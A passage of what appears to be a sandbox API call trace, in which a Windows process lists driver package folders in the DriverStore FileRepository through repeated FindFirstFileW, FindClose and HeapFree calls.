FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_noavin_x64.inf_amd64_neutral_86943dd17860e449\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45c0ff1c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a5af08, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a5af08, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.972] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.973] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45d66b7e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65aa71c8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65aa71c8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.987] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.987] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averhbh826_noaverir_x64.inf_amd64_neutral_2fe3b14136d6e46d\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45e25260, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65acd328, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65acd328, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.010] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.011] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avmx64c.inf_amd64_neutral_8ebb15bf548db022\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x398df1b4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f66124f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f66124f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.042] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.043] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\battery.inf_amd64_neutral_cb8fa151a7b7cb80\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43d90504, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6215ffff, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6215ffff, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.049] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.050] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bda.inf_amd64_neutral_41c6262952846788\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d9bc9ac, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.051] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.051] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43bc7480, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62139e9e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62139e9e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.051] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.051] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd8b83, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c4482cb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c4482cb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.055] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.055] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3af09ebd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5ffc0901, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5ffc0901, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.058] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.058] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcsto.inf_amd64_neutral_2d7208355536945e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40742ec0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x612333a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x612333a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.059] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.059] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcumd.inf_amd64_neutral_db43b26810939b3e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x407db441, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61259503, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61259503, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.059] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.059] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcwia.inf_amd64_neutral_817b8835aed3d6b7\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b145361, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60058e82, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60058e82, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.062] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.063] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfport.inf_amd64_neutral_f41f35e5c21bc350\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b2e8284, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.066] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.067] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bth.inf_amd64_neutral_e54666f6a3e5af91\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38143693, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3ba3e59c, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3ba3e59c, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.070] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.071] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthmtpenum.inf_amd64_neutral_c70e85b87ee4ece9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd8c4a7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6d374f27, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6d374f27, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.071] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.071] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthpan.inf_amd64_neutral_024281c0e4e954e2\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d29879f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.072] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.072] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthprint.inf_amd64_neutral_3c11362fa327f5a4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d92442b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.072] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.072] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthspp.inf_amd64_neutral_1b15060bdfbd09e1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d7f3928, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.073] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.073] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a67f22, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c1164e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c1164e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.073] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.073] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\circlass.inf_amd64_neutral_cf52485bed804e02\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d546063, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60756f2f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60756f2f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.074] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.074] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\compositebus.inf_amd64_neutral_b9280780a8000d4b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766721f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b686335, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b686335, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.074] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.074] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cpu.inf_amd64_neutral_ae5de2e1bf2793c3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42df1487, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.075] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.076] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\crcdisk.inf_amd64_neutral_d10626d1f8b423c3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dd4eab2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60815610, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60815610, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.078] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.078] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalcon_ibv64.inf_amd64_neutral_d065aec3fcf4ec4e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45ee3941, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b195e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b195e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.140] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.140] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalpal_ibv64.inf_amd64_neutral_4c42ac5f00413365\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fc8183, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b3f749, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b3f749, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.383] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.383] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1216mk5_ibv64.inf_amd64_neutral_3eaae75b591bd148\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4616b0a6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b8ba0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b8ba0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.385] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.386] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46229787, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65bd7cca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65bd7cca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.388] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.389] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x460ac9c4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b658a9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b658a9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.395] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.396] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dc21x4vm.inf_amd64_neutral_8887242a56ee027e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43ee7166, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6218615f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6218615f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.396] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.396] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\digitalmediadevice.inf_amd64_neutral_6fd673519d66ab20\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fea1ef0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f85ade, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f85ade, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.397] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.397] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\disk.inf_amd64_neutral_10ce25bbc5a9cc43\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42c28403, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f24b5a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.397] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.397] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 